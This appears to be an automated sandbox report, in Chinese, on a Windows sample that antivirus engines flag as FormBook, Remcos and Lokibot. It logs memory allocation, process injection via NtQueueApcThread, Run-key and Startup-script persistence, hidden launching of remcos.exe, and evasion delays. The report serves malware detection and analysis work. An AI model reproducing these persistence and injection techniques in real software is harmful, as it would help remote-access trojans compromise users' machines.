14.4
0-day
56 个模型检测该样本为恶意!
重新分析
更多

ea5f7ceccf5540860f32abe23534330ccb4b5b082d94b2afb5aa1e6d26a1ae56

632e3d1eedfc816446787802aad4152f.exe

分析耗时

177s

最近分析

文件大小

674.0KB
静态报毒 动态报毒 AI SCORE=84 AVSARHER BTOMTW CKGENERIC CLOUD CONFIDENCE DELF DELPHILESS ELZG EMHC FAREIT FORMBOOK FYAR GDSDA GENERICKD HIGH CONFIDENCE HKQQHS KRYPTIK LOKIBOT MALICIOUS MODERATE QGW@AKK@V8NI R014C0WES20 REMCOS SCORE SUSGEN SUSPICIOUS PE TSCOPE UNSAFE WLPM X2066 ZELPHIF 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee RDN/Generic.grp 20200611 6.0.6.653
Alibaba Trojan:Win32/FormBook.36aa18e4 20190527 0.3.0.5
CrowdStrike win/malicious_confidence_80% (W) 20190702 1.0
Baidu 20190318 1.0.0.2
Avast Win32:Malware-gen 20200611 18.4.3895.0
Tencent Win32.Trojan.Kryptik.Wlpm 20200611 1.0.0.1
Kingsoft 20200611 2013.8.14.323
行为判定
动态指标
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
Allocates read-write-execute memory (usually to unpack itself) (50 out of 117 个事件)
Time & API Arguments Status Return Repeated
1619610617.875
NtAllocateVirtualMemory
process_identifier: 2772
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003e0000
success 0 0
1619610618.078
NtProtectVirtualMemory
process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00468000
success 0 0
1619610618.078
NtAllocateVirtualMemory
process_identifier: 2772
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01f60000
success 0 0
1619628921.557
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003d0000
success 0 0
1619628921.572
NtProtectVirtualMemory
process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00468000
success 0 0
1619628921.572
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01f50000
success 0 0
1619628933.807
NtAllocateVirtualMemory
process_identifier: 1344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003e0000
success 0 0
1619628933.822
NtProtectVirtualMemory
process_identifier: 1344
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00468000
success 0 0
1619628933.822
NtAllocateVirtualMemory
process_identifier: 1344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00790000
success 0 0
1619628935.1045
NtAllocateVirtualMemory
process_identifier: 3164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003d0000
success 0 0
1619628935.1045
NtProtectVirtualMemory
process_identifier: 3164
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00468000
success 0 0
1619628935.1195
NtAllocateVirtualMemory
process_identifier: 3164
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01f50000
success 0 0
1619628936.52575
NtAllocateVirtualMemory
process_identifier: 3332
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003e0000
success 0 0
1619628936.54175
NtProtectVirtualMemory
process_identifier: 3332
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00468000
success 0 0
1619628936.54175
NtAllocateVirtualMemory
process_identifier: 3332
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00550000
success 0 0
1619628947.40025
NtAllocateVirtualMemory
process_identifier: 3460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x008b0000
success 0 0
1619628947.40025
NtProtectVirtualMemory
process_identifier: 3460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00468000
success 0 0
1619628947.40025
NtAllocateVirtualMemory
process_identifier: 3460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01fa0000
success 0 0
1619628948.3545
NtAllocateVirtualMemory
process_identifier: 3644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003e0000
success 0 0
1619628948.3695
NtProtectVirtualMemory
process_identifier: 3644
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00468000
success 0 0
1619628948.3695
NtAllocateVirtualMemory
process_identifier: 3644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01fa0000
success 0 0
1619628949.197625
NtAllocateVirtualMemory
process_identifier: 3904
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003f0000
success 0 0
1619628949.197625
NtProtectVirtualMemory
process_identifier: 3904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00468000
success 0 0
1619628949.197625
NtAllocateVirtualMemory
process_identifier: 3904
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01f60000
success 0 0
1619628949.2295
NtAllocateVirtualMemory
process_identifier: 3944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003e0000
success 0 0
1619628949.2295
NtProtectVirtualMemory
process_identifier: 3944
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00468000
success 0 0
1619628949.2295
NtAllocateVirtualMemory
process_identifier: 3944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01fa0000
success 0 0
1619628960.6975
NtAllocateVirtualMemory
process_identifier: 3124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00350000
success 0 0
1619628960.7135
NtProtectVirtualMemory
process_identifier: 3124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00468000
success 0 0
1619628960.7135
NtAllocateVirtualMemory
process_identifier: 3124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00870000
success 0 0
1619628961.588375
NtAllocateVirtualMemory
process_identifier: 3168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003f0000
success 0 0
1619628961.588375
NtProtectVirtualMemory
process_identifier: 3168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00468000
success 0 0
1619628961.588375
NtAllocateVirtualMemory
process_identifier: 3168
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01fa0000
success 0 0
1619628961.63575
NtAllocateVirtualMemory
process_identifier: 3552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003d0000
success 0 0
1619628961.63575
NtProtectVirtualMemory
process_identifier: 3552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00468000
success 0 0
1619628961.63575
NtAllocateVirtualMemory
process_identifier: 3552
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01f50000
success 0 0
1619628962.07225
NtAllocateVirtualMemory
process_identifier: 3728
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00580000
success 0 0
1619628962.08825
NtProtectVirtualMemory
process_identifier: 3728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00468000
success 0 0
1619628962.08825
NtAllocateVirtualMemory
process_identifier: 3728
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01e70000
success 0 0
1619628962.479875
NtAllocateVirtualMemory
process_identifier: 1100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003f0000
success 0 0
1619628962.494875
NtProtectVirtualMemory
process_identifier: 1100
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00468000
success 0 0
1619628962.494875
NtAllocateVirtualMemory
process_identifier: 1100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x020a0000
success 0 0
1619628963.697
NtAllocateVirtualMemory
process_identifier: 1912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00360000
success 0 0
1619628963.775
NtProtectVirtualMemory
process_identifier: 1912
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00468000
success 0 0
1619628963.854
NtAllocateVirtualMemory
process_identifier: 1912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00670000
success 0 0
1619628966.088875
NtAllocateVirtualMemory
process_identifier: 3260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003d0000
success 0 0
1619628966.088875
NtProtectVirtualMemory
process_identifier: 3260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00468000
success 0 0
1619628966.104875
NtAllocateVirtualMemory
process_identifier: 3260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00580000
success 0 0
1619628974.294124
NtAllocateVirtualMemory
process_identifier: 4088
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003f0000
success 0 0
1619628974.310124
NtProtectVirtualMemory
process_identifier: 4088
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00468000
success 0 0
A process attempted to delay the analysis task. (1 个事件)
description sdfghjkhjjjjjg.exe tried to sleep 489 seconds, actually delayed analysis time by 489 seconds
Creates executable files on the filesystem (2 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZM.vbs
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\install.vbs
Creates a suspicious process (1 个事件)
cmdline "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
Drops a binary and executes it (2 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\install.vbs
Drops an executable to the user AppData folder (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
A process created a hidden window (12 个事件)
Time & API Arguments Status Return Repeated
1619628934.275125
ShellExecuteExW
parameters:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\install.vbs
filepath_r: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\install.vbs
show_type: 0
success 1 0
1619628936.104375
ShellExecuteExW
parameters: /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
filepath: cmd
filepath_r: cmd
show_type: 0
success 1 0
1619628947.447625
ShellExecuteExW
parameters:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\install.vbs
filepath_r: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\install.vbs
show_type: 0
success 1 0
1619628948.88525
ShellExecuteExW
parameters: /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
filepath: cmd
filepath_r: cmd
show_type: 0
success 1 0
1619628960.729875
ShellExecuteExW
parameters:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\install.vbs
filepath_r: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\install.vbs
show_type: 0
success 1 0
1619628962.1355
ShellExecuteExW
parameters: /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
filepath: cmd
filepath_r: cmd
show_type: 0
success 1 0
1619628961.869125
ShellExecuteExW
parameters:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\install.vbs
filepath_r: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\install.vbs
show_type: 0
success 1 0
1619628963.369625
ShellExecuteExW
parameters: /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
filepath: cmd
filepath_r: cmd
show_type: 0
success 1 0
1619628974.402937
ShellExecuteExW
parameters:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\install.vbs
filepath_r: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\install.vbs
show_type: 0
success 1 0
1619628982.427937
ShellExecuteExW
parameters: /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
filepath: cmd
filepath_r: cmd
show_type: 0
success 1 0
1619628976.386687
ShellExecuteExW
parameters:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\install.vbs
filepath_r: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\install.vbs
show_type: 0
success 1 0
1619628978.750875
ShellExecuteExW
parameters: /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
filepath: cmd
filepath_r: cmd
show_type: 0
success 1 0
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (50 out of 93 个事件)
The binary likely contains encrypted or compressed data indicative of a packer (2 个事件)
entropy 7.28909576575791 section {'size_of_data': '0x0002c200', 'virtual_address': '0x00083000', 'entropy': 7.28909576575791, 'name': '.rsrc', 'virtual_size': '0x0002c1d0'} description A section with a high entropy has been found
entropy 0.262258543833581 description Overall entropy of this PE file is high
Expresses interest in specific running processes (2 个事件)
process notepad.exe
process sdfghjkhjjjjjg.exe
Repeatedly searches for a not-found process, you may want to run a web browser during analysis (38 个事件)
Time & API Arguments Status Return Repeated
1619610618.094
Process32NextW
process_name: conhost.exe
snapshot_handle: 0x000000f8
process_identifier: 1948
failed 0 0
1619628921.572
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000f8
process_identifier: 1812
failed 0 0
1619628933.822
Process32NextW
process_name: dllhost.exe
snapshot_handle: 0x000000f8
process_identifier: 1912
failed 0 0
1619628934.916
Process32NextW
process_name: wscript.exe
snapshot_handle: 0x00000124
process_identifier: 3076
failed 0 0
1619628936.54175
Process32NextW
process_name: remcos.exe
snapshot_handle: 0x000000f8
process_identifier: 3332
failed 0 0
1619628948.16625
Process32NextW
process_name: wscript.exe
snapshot_handle: 0x00000118
process_identifier: 3556
failed 0 0
1619628949.197625
Process32NextW
process_name: remcos.exe
snapshot_handle: 0x000000f8
process_identifier: 3944
failed 0 0
1619628949.2295
Process32NextW
process_name: remcos.exe
snapshot_handle: 0x000000f8
process_identifier: 3944
failed 0 0
1619628961.4795
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000011c
process_identifier: 3604
failed 0 0
1619628965.916375
Process32NextW
process_name: remcos.exe
snapshot_handle: 0x00000190
process_identifier: 1912
failed 0 0
1619628961.63575
Process32NextW
process_name: sdfghjkhjjjjjg.exe
snapshot_handle: 0x000000f8
process_identifier: 3728
failed 0 0
1619628962.08825
Process32NextW
process_name: wscript.exe
snapshot_handle: 0x000000f8
process_identifier: 3376
failed 0 0
1619628963.963
Process32NextW
process_name: remcos.exe
snapshot_handle: 0x000000f8
process_identifier: 1912
failed 0 0
1619628966.104875
Process32NextW
process_name: sdfghjkhjjjjjg.exe
snapshot_handle: 0x000000f8
process_identifier: 3260
failed 0 0
1619628975.201124
Process32NextW
process_name: notepad.exe
snapshot_handle: 0x0000011c
process_identifier: 3780
failed 0 0
1619628975.515436
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000f8
process_identifier: 3296
failed 0 0
1619629024.593061
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000007d4
process_identifier: 5064
failed 0 0
1619628979.511187
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000f8
process_identifier: 2184
failed 0 0
1619628983.576403
Process32NextW
process_name: remcos.exe
snapshot_handle: 0x000000f8
process_identifier: 2868
failed 0 0
1619628991.315284
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000fc
process_identifier: 4124
failed 0 0
1619628992.003534
Process32NextW
process_name: sdfghjkhjjjjjg.exe
snapshot_handle: 0x000000f8
process_identifier: 4212
failed 0 0
1619628992.831659
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000f8
process_identifier: 4416
failed 0 0
1619629013.581659
Process32NextW
process_name: sdfghjkhjjjjjg.exe
snapshot_handle: 0x000003e4
process_identifier: 4304
failed 0 0
1619628994.987286
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000f8
process_identifier: 4704
failed 0 0
1619629003.471286
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000022c
process_identifier: 5028
failed 0 0
1619628998.065659
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000f8
process_identifier: 4868
failed 0 0
1619629018.237659
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000003d0
process_identifier: 4860
failed 0 0
1619629000.971159
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000f8
process_identifier: 4996
failed 0 0
1619629003.893534
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000f8
process_identifier: 5092
failed 0 0
1619629013.862284
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000f8
process_identifier: 4500
failed 0 0
1619629015.159784
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000f8
process_identifier: 4072
failed 0 0
1619629018.502909
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000f8
process_identifier: 4288
failed 0 0
1619629022.081034
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000f8
process_identifier: 5064
failed 0 0
1619629025.096284
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000f8
process_identifier: 4540
failed 0 0
1619629025.487534
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000f8
process_identifier: 2268
failed 0 0
1619629028.002909
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000f8
process_identifier: 3800
failed 0 0
1619629043.017909
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000f8
process_identifier: 2972
failed 0 0
1619629047.830909
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x000000fc
process_identifier: 4240
failed 0 0
网络通信
Creates an Alternate Data Stream (ADS) (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe:ZoneIdentifier
Allocates execute permission to another process indicative of possible code injection (7 个事件)
Time & API Arguments Status Return Repeated
1619610631.281
NtAllocateVirtualMemory
process_identifier: 1752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000100
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000b0000
success 0 0
1619628948.60475
NtAllocateVirtualMemory
process_identifier: 3716
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000100
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000b0000
success 0 0
1619628961.2605
NtAllocateVirtualMemory
process_identifier: 1880
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000100
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000b0000
success 0 0
1619628974.541875
NtAllocateVirtualMemory
process_identifier: 3780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000100
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000b0000
success 0 0
1619628976.65
NtAllocateVirtualMemory
process_identifier: 628
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000100
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000f0000
success 0 0
1619628991.574187
NtAllocateVirtualMemory
process_identifier: 4136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000100
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000b0000
success 0 0
1619628999.951403
NtAllocateVirtualMemory
process_identifier: 4756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000100
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000b0000
success 0 0
Installs itself for autorun at Windows startup (7 个事件)
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\remcos reg_value "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\remcos reg_value "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\remcos reg_value "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\remcos reg_value "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\remcos reg_value "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\remcos reg_value "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZM.vbs
Creates a thread using NtQueueApcThread in a remote process potentially indicative of process injection (14 个事件)
Process injection Process 2772 created a thread in remote process 1752
Process injection Process 3332 created a thread in remote process 3716
Process injection Process 3944 created a thread in remote process 1880
Process injection Process 1100 created a thread in remote process 3780
Process injection Process 1912 created a thread in remote process 628
Process injection Process 3748 created a thread in remote process 4136
Process injection Process 2868 created a thread in remote process 4756
Time & API Arguments Status Return Repeated
1619610631.281
NtQueueApcThread
thread_handle: 0x00000108
process_identifier: 1752
function_address: 0x000b05c0
parameter: 0x000c0000
success 0 0
1619628948.60475
NtQueueApcThread
thread_handle: 0x00000108
process_identifier: 3716
function_address: 0x000b05c0
parameter: 0x000c0000
success 0 0
1619628961.2605
NtQueueApcThread
thread_handle: 0x00000108
process_identifier: 1880
function_address: 0x000b05c0
parameter: 0x000c0000
success 0 0
1619628974.541875
NtQueueApcThread
thread_handle: 0x00000108
process_identifier: 3780
function_address: 0x000b05c0
